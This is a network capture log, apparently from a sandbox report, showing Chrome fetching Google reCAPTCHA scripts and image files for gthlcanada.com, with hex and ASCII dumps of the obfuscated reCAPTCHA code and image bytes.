                                                                                                                          2025-01-13 21:01:21 UTC1255INData Raw: 48 5b 36 5d 3c 3c 38 7c 48 5b 37 5d 29 2c 72 2e 70 75 73 68 28 48 5b 38 5d 3c 3c 32 34 7c 48 5b 39 5d 3c 3c 31 36 7c 48 5b 31 30 5d 3c 3c 38 7c 48 5b 31 31 5d 29 7d 2c 6b 50 3d 66 75 6e 63 74 69 6f 6e 28 48 2c 72 29 7b 72 65 74 75 72 6e 20 58 5b 72 5d 28 58 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 66 6c 6f 6f 72 3a 48 2c 63 6f 6e 73 6f 6c 65 3a 48 2c 72 65 70 6c 61 63 65 3a 48 2c 70 6f 70 3a 48 2c 6c 65 6e 67 74 68 3a 48 2c 70 72 6f 74 6f 74 79 70 65 3a 48 2c 64 6f 63 75 6d 65 6e 74 3a 48 2c 63 61 6c 6c 3a 48 2c 73 70 6c 69 63 65 3a 48 2c 73 74 61 63 6b 3a 48 2c 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 3a 48 2c 70 61 72 65 6e 74 3a 48 7d 29 7d 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 48 2c 72 2c 63 29 7b 69 66 28 48 3d 3d 34 36 38 7c 7c 48 3d 3d
                                                                                                                          Data Ascii: H[6]<<8|H[7]),r.push(H[8]<<24|H[9]<<16|H[10]<<8|H[11])},kP=function(H,r){return X[r](X.prototype,{floor:H,console:H,replace:H,pop:H,length:H,prototype:H,document:H,call:H,splice:H,stack:H,propertyIsEnumerable:H,parent:H})},v=function(H,r,c){if(H==468||H==
                                                                                                                          2025-01-13 21:01:21 UTC1255INData Raw: 2c 72 2c 78 2c 48 2c 75 2c 74 68 69 73 2c 79 29 7d 63 61 74 63 68 28 44 29 7b 68 28 44 2c 74 68 69 73 29 2c 48 28 66 75 6e 63 74 69 6f 6e 28 5a 29 7b 5a 28 47 2e 49 29 7d 29 7d 7d 2c 70 6e 3d 66 75 6e 63 74 69 6f 6e 28 48 2c 72 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 74 68 69 73 2e 6e 3d 28 74 68 69 73 2e 55 3d 5b 5d 2c 30 29 7d 72 65 74 75 72 6e 5b 66 75 6e 63 74 69 6f 6e 28 78 29 7b 28 72 2e 51 45 28 78 29 2c 48 29 2e 51 45 28 78 29 7d 2c 28 48 3d 28 63 2e 70 72 6f 74 6f 74 79 70 65 2e 53 4c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 6e 3d 3d 3d 30 29 72 65 74 75 72 6e 5b 30 2c 30 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 55 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 78 2c 79 29 7b 72 65 74 75 72 6e 20 78 2d 79 7d 29 2c 5b 74 68
                                                                                                                          Data Ascii: ,r,x,H,u,this,y)}catch(D){h(D,this),H(function(Z){Z(G.I)})}},pn=function(H,r){function c(){this.n=(this.U=[],0)}return[function(x){(r.QE(x),H).QE(x)},(H=(c.prototype.SL=function(){if(this.n===0)return[0,0];return this.U.sort(function(x,y){return x-y}),[th
                                                                                                                          2025-01-13 21:01:21 UTC1255INData Raw: 30 29 29 2c 72 7d 2c 64 63 3d 66 75 6e 63 74 69 6f 6e 28 48 2c 72 2c 63 2c 78 2c 79 2c 75 2c 47 2c 44 2c 5a 29 7b 66 6f 72 28 5a 3d 28 44 3d 28 75 2e 48 74 3d 6b 50 28 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 6f 6e 63 61 74 28 29 7d 7d 2c 28 75 2e 75 24 3d 75 5b 55 5d 2c 28 75 2e 50 74 3d 52 48 2c 75 29 2e 61 78 3d 67 63 2c 75 2e 53 29 29 2c 75 2e 67 4c 3d 58 5b 75 2e 53 5d 28 75 2e 48 74 2c 7b 76 61 6c 75 65 3a 7b 76 61 6c 75 65 3a 7b 7d 7d 7d 29 2c 30 29 2c 5b 5d 29 3b 44 3c 33 34 36 3b 44 2b 2b 29 5a 5b 44 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 44 29 3b 69 66 28 28 75 2e 75 3d 28 63 3d 28 75 2e 59 3d 28 75 2e 56 3d 28 75 2e 76 74 3d 38 30 30 31 2c 28 75 2e 59 51 3d 66 75 6e 63 74
                                                                                                                          Data Ascii: 0)),r},dc=function(H,r,c,x,y,u,G,D,Z){for(Z=(D=(u.Ht=kP({get:function(){return this.concat()}},(u.u$=u[U],(u.Pt=RH,u).ax=gc,u.S)),u.gL=X[u.S](u.Ht,{value:{value:{}}}),0),[]);D<346;D++)Z[D]=String.fromCharCode(D);if((u.u=(c=(u.Y=(u.V=(u.vt=8001,(u.YQ=funct
                                                                                                                          2025-01-13 21:01:21 UTC1255INData Raw: 76 28 4e 2c 50 2c 66 75 6e 63 74 69 6f 6e 28 4b 29 7b 72 65 74 75 72 6e 20 65 76 61 6c 28 4b 29 7d 28 76 24 28 6b 28 50 2e 69 2c 42 29 29 29 29 29 7d 2c 28 54 28 28 76 28 28 54 28 34 36 35 2c 28 76 28 32 2c 75 2c 28 54 28 31 34 2c 28 54 28 28 75 2e 44 44 3d 28 76 28 35 30 36 2c 75 2c 28 76 28 32 31 38 2c 28 28 54 28 32 31 35 2c 28 54 28 33 37 33 2c 28 54 28 34 31 39 2c 66 75 6e 63 74 69 6f 6e 28 50 29 7b 66 6e 28 50 2c 33 29 7d 2c 28 54 28 35 34 2c 28 54 28 32 39 33 2c 28 54 28 32 35 38 2c 28 54 28 34 34 31 2c 28 75 2e 6b 51 3d 28 54 28 36 36 2c 28 76 28 31 33 32 2c 28 54 28 36 38 2c 66 75 6e 63 74 69 6f 6e 28 50 29 7b 71 4c 28 31 2c 50 29 7d 2c 28 76 28 31 38 39 2c 75 2c 28 54 28 28 54 28 34 39 31 2c 66 75 6e 63 74 69 6f 6e 28 50 2c 42 2c 4e 2c 4b 29 7b
                                                                                                                          Data Ascii: v(N,P,function(K){return eval(K)}(v$(k(P.i,B)))))},(T((v((T(465,(v(2,u,(T(14,(T((u.DD=(v(506,u,(v(218,((T(215,(T(373,(T(419,function(P){fn(P,3)},(T(54,(T(293,(T(258,(T(441,(u.kQ=(T(66,(v(132,(T(68,function(P){qL(1,P)},(v(189,u,(T((T(491,function(P,B,N,K){
                                                                                                                          2025-01-13 21:01:21 UTC1255INData Raw: 28 4a 57 28 50 29 7c 30 29 29 25 42 2c 4b 2b 3d 5a 5b 45 5b 4e 5d 5d 3b 76 28 66 2c 50 2c 4b 29 7d 29 2c 75 29 2c 75 29 29 2c 66 75 6e 63 74 69 6f 6e 28 50 2c 42 2c 4e 2c 4b 2c 53 29 7b 76 28 28 4e 3d 6b 28 28 4b 3d 28 42 3d 6b 28 50 2c 28 4b 3d 28 53 3d 4d 28 50 29 2c 42 3d 4d 28 50 29 2c 4d 28 50 29 29 2c 4e 3d 4d 28 50 29 2c 42 29 29 2c 6b 28 50 2c 4b 29 29 2c 50 29 2c 4e 29 2c 53 29 2c 50 2c 49 48 28 4e 2c 4b 2c 50 2c 42 29 29 7d 29 2c 75 29 2c 66 75 6e 63 74 69 6f 6e 28 50 2c 42 2c 4e 2c 4b 2c 53 2c 45 2c 66 29 7b 69 66 28 21 74 28 74 72 75 65 2c 42 2c 74 72 75 65 2c 50 29 29 7b 69 66 28 75 36 28 28 4e 3d 28 66 3d 28 53 3d 28 42 3d 28 4e 3d 4d 28 28 53 3d 4d 28 28 66 3d 4d 28 28 42 3d 4d 28 50 29 2c 50 29 29 2c 50 29 29 2c 50 29 29 2c 6b 28 50 2c 42
                                                                                                                          Data Ascii: (JW(P)|0))%B,K+=Z[E[N]];v(f,P,K)}),u),u)),function(P,B,N,K,S){v((N=k((K=(B=k(P,(K=(S=M(P),B=M(P),M(P)),N=M(P),B)),k(P,K)),P),N),S),P,IH(N,K,P,B))}),u),function(P,B,N,K,S,E,f){if(!t(true,B,true,P)){if(u6((N=(f=(S=(B=(N=M((S=M((f=M((B=M(P),P)),P)),P)),k(P,B
                                                                                                                          2025-01-13 21:01:21 UTC1255INData Raw: 74 72 69 6e 67 28 32 29 2e 6c 65 6e 67 74 68 2c 53 3d 30 2c 5b 5d 29 3b 53 3c 42 3b 53 2b 2b 29 56 5b 53 5d 7c 7c 28 4e 5b 53 5d 3d 46 28 45 29 29 3b 66 6f 72 28 45 3d 30 3b 45 3c 42 3b 45 2b 2b 29 56 5b 45 5d 26 26 28 4e 5b 45 5d 3d 4d 28 50 29 29 3b 66 6f 72 28 4a 3d 5b 5d 3b 61 2d 2d 3b 29 4a 2e 70 75 73 68 28 6b 28 50 2c 4d 28 50 29 29 29 3b 54 28 66 2c 66 75 6e 63 74 69 6f 6e 28 70 2c 59 2c 7a 2c 6d 2c 48 24 29 7b 66 6f 72 28 7a 3d 28 59 3d 28 6d 3d 30 2c 5b 5d 29 2c 5b 5d 29 3b 6d 3c 42 3b 6d 2b 2b 29 7b 69 66 28 21 56 5b 48 24 3d 4e 5b 6d 5d 2c 6d 5d 29 7b 66 6f 72 28 3b 48 24 3e 3d 59 2e 6c 65 6e 67 74 68 3b 29 59 2e 70 75 73 68 28 4d 28 70 29 29 3b 48 24 3d 59 5b 48 24 5d 7d 7a 2e 70 75 73 68 28 48 24 29 7d 28 70 2e 56 3d 53 4a 28 70 2c 4a 2e 73
                                                                                                                          Data Ascii: tring(2).length,S=0,[]);S<B;S++)V[S]||(N[S]=F(E));for(E=0;E<B;E++)V[E]&&(N[E]=M(P));for(J=[];a--;)J.push(k(P,M(P)));T(f,function(p,Y,z,m,H$){for(z=(Y=(m=0,[]),[]);m<B;m++){if(!V[H$=N[m],m]){for(;H$>=Y.length;)Y.push(M(p));H$=Y[H$]}z.push(H$)}(p.V=SJ(p,J.s
                                                                                                                          2025-01-13 21:01:21 UTC1255INData Raw: 2c 75 29 7b 69 66 28 21 48 2e 49 29 7b 48 2e 50 2b 2b 3b 74 72 79 7b 66 6f 72 28 79 3d 28 78 3d 28 63 3d 48 2e 4e 2c 30 29 2c 76 6f 69 64 20 30 29 3b 2d 2d 72 3b 29 74 72 79 7b 69 66 28 75 3d 76 6f 69 64 20 30 2c 48 2e 56 29 79 3d 42 24 28 48 2e 56 2c 48 29 3b 65 6c 73 65 7b 69 66 28 28 78 3d 6b 28 48 2c 34 36 38 29 2c 78 29 3e 3d 63 29 62 72 65 61 6b 3b 79 3d 6b 28 48 2c 28 75 3d 28 76 28 39 30 2c 48 2c 78 29 2c 4d 28 48 29 29 2c 75 29 29 7d 74 28 66 61 6c 73 65 2c 28 79 26 26 79 5b 65 4a 5d 26 32 30 34 38 3f 79 28 48 2c 72 29 3a 67 28 30 2c 5b 43 2c 32 31 2c 75 5d 2c 48 29 2c 72 29 2c 66 61 6c 73 65 2c 48 29 7d 63 61 74 63 68 28 47 29 7b 6b 28 48 2c 34 39 33 29 3f 67 28 32 32 2c 47 2c 48 29 3a 76 28 34 39 33 2c 48 2c 47 29 7d 69 66 28 21 72 29 7b 69 66
                                                                                                                          Data Ascii: ,u){if(!H.I){H.P++;try{for(y=(x=(c=H.N,0),void 0);--r;)try{if(u=void 0,H.V)y=B$(H.V,H);else{if((x=k(H,468),x)>=c)break;y=k(H,(u=(v(90,H,x),M(H)),u))}t(false,(y&&y[eJ]&2048?y(H,r):g(0,[C,21,u],H),r),false,H)}catch(G){k(H,493)?g(22,G,H):v(493,H,G)}if(!r){if


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          125192.168.11.2049951142.251.111.1054431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:21 UTC957OUTGET /recaptcha/api2/webworker.js?hl=en&v=zIriijn3uj5Vpknvt_LnfNbF HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: same-origin
                                                                                                                          Sec-Fetch-Dest: worker
                                                                                                                          Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfHrSkUAAAAAPnKk5cT6JuKlKPzbwyTYuO8--Vr&co=aHR0cHM6Ly9ndGhsY2FuYWRhLmNvbTo0NDM.&hl=en&v=zIriijn3uj5Vpknvt_LnfNbF&size=invisible&cb=s7x76yuho1vi
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                                                                                                                          2025-01-13 21:01:21 UTC917INHTTP/1.1 200 OK
                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                          Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Expires: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Cache-Control: private, max-age=300
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2025-01-13 21:01:21 UTC108INData Raw: 36 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 7a 49 72 69 69 6a 6e 33 75 6a 35 56 70 6b 6e 76 74 5f 4c 6e 66 4e 62 46 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 29 3b 0d 0a
                                                                                                                          Data Ascii: 66importScripts('https://www.gstatic.com/recaptcha/releases/zIriijn3uj5Vpknvt_LnfNbF/recaptcha__en.js');
                                                                                                                          2025-01-13 21:01:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          126192.168.11.204995354.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:21 UTC647OUTGET /app/uploads/gthl/2019/12/14094644/ELNIU7DXYAAM9hQ.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:21 UTC449INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 78608
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:22 GMT
                                                                                                                          Last-Modified: Sat, 14 Dec 2019 14:46:45 GMT
                                                                                                                          ETag: "ec25209aa570c7c90ce92c1dab6e4d28"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 cdb7a265f783ce0c07661e9c6820c2c4.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: kPS1KBX9tlsnpHz5Zp4OSzuxsJjL1eM50usAxmQhvjrlmhkdOmOJaw==
                                                                                                                          2025-01-13 21:01:21 UTC15935INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 02 34 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 24 61 70 70 6c 04 00 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e1 00 07 00 07 00 0d 00 16 00 20 61 63 73 70 41 50 50 4c 00 00 00 00 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 61 70 70 6c ca 1a 95 82 25 7f 10 4d 38 99 13 d5 d1 ea 15 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 64 65 73 63 00 00 00 fc 00 00 00 65 63 70 72 74 00 00 01 64 00 00 00 23 77 74 70 74 00 00 01 88 00 00 00 14 72 58 59 5a 00 00 01 9c 00 00 00 14 67 58 59 5a 00 00 01 b0 00 00 00 14 62 58 59 5a 00 00 01 c4 00 00 00 14 72 54 52 43 00 00 01 d8 00 00 00 20 63
                                                                                                                          Data Ascii: JFIF4ICC_PROFILE$applmntrRGB XYZ acspAPPLAPPL-appl%M8descecprtd#wtptrXYZgXYZbXYZrTRC c
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 4e ea b5 23 31 a9 50 2b b5 83 23 92 b8 6d 4d 61 3d a1 84 a9 64 20 99 79 92 52 99 12 76 ec fc 36 b6 b6 98 96 67 e9 50 7d 81 7e e5 c7 69 9d 52 b4 55 67 02 19 23 f4 db 86 4c 7d 8a f3 47 62 2e 55 ca b5 e8 76 e1 a5 a5 d9 69 69 69 96 96 9b d7 a5 a5 a5 a6 44 2c b9 53 8a b2 5b 73 1e ed a5 3c 87 d1 a7 1f 32 68 f4 84 17 22 e4 74 c3 e8 d2 e5 5c a8 a1 07 47 56 37 53 d1 4f 58 99 1c 04 ca 08 b7 3b 59 08 d8 a4 92 45 d1 15 21 3a 29 9f 7f 53 87 38 1c 19 0b c3 1d 6b f6 6d 36 d1 ba e6 5c cb 99 97 32 63 59 57 db 28 4b f8 79 90 bf 33 3f 65 cc b9 97 32 62 da c1 5e e8 1b fa 5d 99 c6 46 93 0f 69 6b d4 ec b5 c7 4b 4b 95 6b d1 a4 23 b4 ec cb 5e 8e 55 a6 4e 2c 9c 36 ad 57 76 79 23 74 60 4a 3e ab bd 78 5a 38 b9 13 02 d2 d3 ad 2d 2d 32 d2 d2 d7 1e cb 95 1c 00 e8 eb 36 a5 ab d8 61 30
                                                                                                                          Data Ascii: N#1P+#mMa=d yRv6gP}~iRUg#L}Gb.UviiiD,S[s<2h"t\GV7SOX;YE!:)S8km6\2cYW(Ky3?e2b^]FikKKk#^UN,6Wvy#t`J>xZ8--26a0
                                                                                                                          2025-01-13 21:01:21 UTC1457INData Raw: 92 33 56 9c ba 5e 59 66 c6 13 be ce 48 4b 1e 47 46 7e 87 2f d9 73 4c 8e 8d d8 c8 84 5e 7a 19 7a 0d d0 b2 57 9b a5 ad 79 a0 57 58 34 5e 7b 91 00 d1 a8 dc 2b ad 02 da 87 75 2d a7 c6 7e 20 a8 6e 60 71 a0 e1 d0 cf 46 1a 23 ef d0 ce ce 9d 17 93 cc 7c d3 b2 3e e9 e9 5d 22 a0 ad 63 01 75 95 f9 8e 5f b7 e4 b0 41 a1 a4 a6 b7 8d 31 fd 8b 05 52 3c 16 38 2b ad 42 8b 14 38 95 49 9d 74 52 b8 a7 b7 9b 7a 47 98 d0 d1 cb 40 58 e8 ae 8a 68 aa eb e2 bc 9a 53 e7 1b bb d6 3a 46 39 1a 1c d3 fb 76 2b 25 8b 55 5a d5 92 cb f6 0a 68 a3 08 a2 bb 23 3c 55 6e 9e cb cb 6e 22 ce b8 ca ca 49 bb 76 55 f6 bd f0 11 c0 8b c1 56 4b 51 77 c2 cc d0 8a cf 00 68 f7 89 da 3d 20 f0 16 f2 c2 9a 37 c2 de 59 aa 68 aa a1 59 85 79 a9 b2 c4 ea 11 91 57 c6 fb 77 c2 c1 53 fc 5f 2e 85 28 b6 5c e0 b6 68 e5
                                                                                                                          Data Ascii: 3V^YfHKGF~/sL^zzWyWX4^{+u-~ n`qF#|>]"cu_A1R<8+B8ItRzG@XhS:F9v+%UZh#<Unn"IvUVKQwh= 7YhYyWwS_.(\h
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 73 ca ee ca ef 3b d7 a5 03 cb f9 db f2 fe a2 e0 45 54 8d ff 00 3e d5 a1 05 24 40 e7 06 5f 51 a2 a0 f3 15 bb 30 73 0a a1 cf 10 c3 8c a0 5a be 60 2f 45 56 d8 5c c2 80 1b 84 1a 58 77 98 81 99 44 bd 34 3b cc ce 59 e1 b5 ee 20 5d 62 75 ce e4 ef 98 b3 12 6d d1 91 1b 4d 7c f1 f1 16 9c 2e 09 fd ce 27 db f4 3b 47 35 96 ea 7b 4f cc 1c e8 7d 62 e9 97 37 ec 8e e9 b3 d2 00 b7 ed 2b 10 64 d1 1f 09 53 48 5f 5e fd 53 0b a2 5b 94 bc 4b 1c e6 2f 59 e6 b0 ec 62 c7 2f ce 5e cf 97 4f be ac 09 78 32 c6 0d bd 20 43 7a 7c d3 ff 00 11 cd b3 6f 57 ea 1c 6f d0 93 3c 0d 81 6a f8 81 35 7f 9d a5 91 28 73 39 6a 55 18 38 8d c4 7d c8 fa cf 1f ed ac be 96 cf f9 98 eb 17 1d 06 32 95 2b 39 41 b4 39 7b 7f 33 66 66 5b cc d1 03 75 fe 07 ea 6d c0 1e d3 67 45 b0 7e 5e 66 b5 53 c8 97 c3 de 01 fa
                                                                                                                          Data Ascii: s;ET>$@_Q0sZ`/EV\XwD4;Y ]bumM|.';G5{O}b7+dSH_^S[K/Yb/^Ox2 Cz|oWo<j5(s9jU8}2+9A9{3ff[umgE~^fS
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 8c 48 85 28 84 51 8a 6a 1b f0 5b 46 20 5b 4f 08 5a ba 23 68 d7 95 f1 85 26 58 84 94 1b 2d 09 4b 63 df a1 04 a0 b5 a4 27 c6 22 33 6a cd 82 49 a3 76 86 df ed 95 d0 63 12 6c 45 0f 41 4d 95 d3 c3 4a d1 45 61 f9 78 08 20 92 49 24 92 48 20 42 e6 63 d2 62 7c 08 96 1d c8 21 94 d9 7e 86 bd 8d 5c 1d 28 36 58 4a b1 26 17 b0 b5 ab 14 da 15 14 e1 4d 3c 42 13 c2 7e 83 66 cd 9c 42 2a 28 db 2b e8 dd 10 58 48 b4 38 9a 1a 07 f4 21 ec 52 e9 c1 de 2e 16 f1 ec 42 74 a6 c9 5d f1 84 21 09 88 42 10 78 4d 9d 21 08 70 6f 58 69 87 40 29 84 d9 65 34 7a 18 93 8c f2 77 88 3d 15 55 96 27 50 d4 ab f0 13 10 9e 73 0c e8 98 84 1d 15 84 39 a2 24 7f 8c 6b 62 aa 5d 8d 18 92 5c c5 39 34 cb 53 27 8f b9 74 a8 4f c1 13 10 84 21 31 08 31 8b 64 21 33 08 1d 9b f1 6c 7d 6f 44 94 71 ac 26 4d e6 8f a1
                                                                                                                          Data Ascii: H(Qj[F [OZ#h&X-Kc'"3jIvclEAMJEax I$H Bcb|!~\(6XJ&M<B~fB*(+XH8!R.Bt]!BxM!poXi@)e4zw=U'Ps9$kb]\94S'tO!11d!3l}oDq&M
                                                                                                                          2025-01-13 21:01:21 UTC5051INData Raw: 7b b1 ce 25 fd 75 6d 16 21 93 a8 b3 27 45 b1 6f 51 15 d9 b1 07 bc a1 e9 95 99 2d a6 04 f1 2a 44 16 8c d8 03 ee a0 ef 0f 35 0d ed 4e 65 b6 d0 73 8f 32 cd 86 1b 58 62 a7 3e b9 83 78 f6 b8 bd c5 53 e0 ff 00 0e de 62 02 0b 8d 71 0b 35 dc 50 b6 ad 13 19 d3 51 07 00 c9 bb 77 31 54 79 f5 28 9d a8 b3 6c be bd 6e 70 15 9d 4b 24 f0 db d4 4e 20 4f c4 a5 e5 09 91 e0 39 95 67 81 42 17 bd 4a 8e be 5f c6 58 05 84 3d 2b 8f 81 95 d8 a9 73 81 08 2f 20 ed 8f 42 39 3a c9 30 90 b7 3e e5 79 44 0a b1 26 ac 8b 11 57 41 cc e1 af 2e 3b 46 5c e0 35 d1 05 55 ad 89 cb a8 7b 7d 0f 29 b8 6c dd a5 3e a0 7e 49 f6 f2 91 97 d9 15 0a 02 de 79 2f c4 cb 3a 94 37 6c b2 e1 9c 54 31 52 d7 d4 b6 f1 bb dc cc 8e af b6 3c 91 e0 84 4d bb cf 70 17 76 ea 35 15 18 ae 28 05 ba 5d 07 11 f4 5d 72 1b 46 a2
                                                                                                                          Data Ascii: {%um!'EoQ-*D5Nes2Xb>xSbq5PQw1Ty(lnpK$N O9gBJ_X=+s/ B9:0>yD&WA.;F\5U{})l>~Iy/:7lT1R<Mpv5(]]rF
                                                                                                                          2025-01-13 21:01:21 UTC7013INData Raw: 79 3b 1e 12 3a 1b 3e ae 3f f9 5a 97 89 da 4b c2 d3 21 65 ac 9e 48 fa 32 5e a6 e5 ca e2 3d de 36 3c 8a 5c 31 4b 20 98 2f 8b 73 28 5c 90 00 18 1c 15 3a 09 62 c5 0b ca ef bc c5 ed 2d ad cb 97 3e 7a 80 4a 2b 25 ea c2 32 b4 19 c7 17 ec 1f a9 45 4c d2 73 52 47 14 42 3b d6 6a 60 04 8d 1e 16 29 e7 dc 32 2c 53 4e 7c 05 6f 92 04 6b 22 f9 13 f9 23 a2 9b 03 c8 a7 e5 4b 23 14 0f c4 0a f4 5d e7 39 15 fa 96 af 5c 38 f1 42 e1 ad 4f 66 04 8b 06 71 03 be 8c 8b 9b 82 82 f1 f9 84 24 61 a0 a1 69 eb 53 28 49 71 b1 33 7d 54 3c 16 12 e7 11 1b ca 1d 2d 97 35 10 63 8b e7 24 5c f2 d9 40 dd 59 e2 58 dd a5 72 2c ab f7 28 b8 b4 db fd 15 1f a8 37 29 79 37 59 8f 65 30 a9 af 98 46 14 b1 4b 6f 98 e0 02 cd 8b e6 61 31 66 05 14 06 09 5c d0 b6 c8 c3 60 2b bf 4c c5 d3 d5 a3 a5 15 65 86 33 96
                                                                                                                          Data Ascii: y;:>?ZK!eH2^=6<\1K /s(\:b->zJ+%2ELsRGB;j`)2,SN|ok"#K#]9\8BOfq$aiS(Iq3}T<-5c$\@YXr,(7)y7Ye0FKoa1f\`+Le3


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          127192.168.11.204995454.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:21 UTC456OUTGET /app/uploads/gthl/2023/08/31160426/Screen-Shot-2023-08-31-at-4.03.51-PM-e1693512300199-730x640.png HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:21 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 605320
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:22 GMT
                                                                                                                          Last-Modified: Thu, 31 Aug 2023 20:05:14 GMT
                                                                                                                          ETag: "634eb1f5d73456c536aeb9cd8cb923d5"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
